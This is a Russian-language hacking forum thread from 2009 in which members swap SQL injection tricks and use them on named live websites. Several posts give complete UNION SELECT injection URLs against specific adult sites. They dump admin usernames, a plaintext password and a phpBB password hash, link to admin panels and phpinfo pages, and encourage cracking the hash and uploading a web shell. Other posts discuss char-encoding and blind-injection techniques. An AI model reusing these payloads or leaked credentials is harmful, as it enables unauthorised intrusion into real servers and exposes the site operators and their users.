Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ссыль дай

    сорри, не заметил
     
    #5061 Pashkela, 29 Jan 2009
    Last edited: 29 Jan 2009
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Кому адресовано?))
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Я и говорю, хекс не катит, а char действует. Просто надо чарить не как в MYSQL...

    Вот например таблица user, переведённая в char для PostgreSQL.

    chr(117)||chr(115)||chr(101)||chr(114)
     
    1 person likes this.
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Тьфу,чёрт...А я думал,что это пробел.Это OR чтоль ? Лан,пасип те большое.Завтра попробую...а сейчас сонная дрема меня заберёт(
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    это конкатенация
     
  6. omel

    omel Elder - Старейшина

    Joined:
    26 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Так значит вместо кавычек ставить %27? запрос
    UPDATE+%27auth%27'+SET+usertype=%27admin%27+WHERE+user_id=2
     
  7. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    аж смешно,вот ещё одна така скуль
    Code:
    http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20admin--
    пароли такие же..
    admin::root78
    http://sex.dp.ua/admin.php
    юзеров воще не нашол
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    нет.. ' и %27 - это одно и тоже. и сэкранируется это все все равно.
    Кроме того сам запрос у тебя неправильный,

    это бред... такое проканает только в MSSQL, да и то не всегда..

    вот так было бы, если бы была MSSQL

    то есть два запроса сразу идут.. в mysql такое нельзя делать.
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://2ip.ru/server.php?ip=193.200.173.5
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    чо вы там мучаетесь - надо уже шелл заливать ))

     
  11. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а к чему тогда табла admin?
    и вот ещё такой же сайт, на нём выдрал
    Code:
    http://www.pitersex.com/details_news.php?page=1&id=107%20UNION%20SELECT%201,password%20,3,login,5,6,7%20FROM%20users%20--
    они тоже не с него?

    блин,я в этом далёк)
     
    #5071 TELO, 29 Jan 2009
    Last edited: 29 Jan 2009
  12. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а что даст шелл?...я принципально знаю что это..но всё же...подскажи,или может faq на єту тему
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    ну а зачем, тогда скуль раскручивать? Чтоб получить шелл или админку хотя бы.. чтоб доступ получить к серву.. а дальше уж решай сам..

    что касается админки -это фейк какой то наверное.. левая админка видимо..
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ыыыыы

    http://www.sex.dp.ua/phpinfo.php
     
    1 person likes this.
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    матёро))
     
    1 person likes this.
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Там есть форум phpbb3. можно поглумиться:))) А можно и шелл залить:

    Code:
    
    http://www.sex.dp.ua/forum/
    
    http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.columns+where+table_name=0x7068706262335F7573657273--
    
    http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(username,0x3a,user_password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb3_users+limit+2,1--
    
    Сашок - 220778 (юзер с ID=3). 
    http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(user_type,0x3a,username,0x3a,user_password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb3_users+where+user_type=3+limit+0,1--
    
    3:admin:$H$7mXvdxG0gVQriTbrzTiSoJAUtMUjEA/
    
    админка здесь:
    
    http://www.sex.dp.ua/forum/adm/
    
    Расшифровывай хеш, заливай шелл
    
     
    #5076 Pashkela, 29 Jan 2009
    Last edited: 29 Jan 2009
  17. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    а если скуля слепая без вывода (1 столбец)
    что делать?
    как вывести то?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Читать мою подпись - там на все случаи практически. Или ссылку сюда давай
     
  19. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Спасибо за ответ.
    Можно в таком случае привести пример на моем случае.
    Есть порядка 12к записей.
    Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество.

    p.s. Возможно я туплю, но что-то реальный ступор у меня...
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    F4R в слепой скуле только подзапросы, читай статьи по скулям, материала куча, практически в любой статье есть описание работы с подзапросами

    Octave_Parango на каком твоём случае нужно превести пример? Ссылки нет. И что значит лимит не работает? Так не бывает к счастью ). Он просто не может не работать. А дамп базы через скуль, это вобщем никогда не было приятной процедурой(особенно когда вывод по одной записи). Скуль для этого вобщем-то не используют в основном. Через неё получают доступ в админку, или напрямую льют шелл, а потом уже дампят базу
     
Thread Status:
Not open for further replies.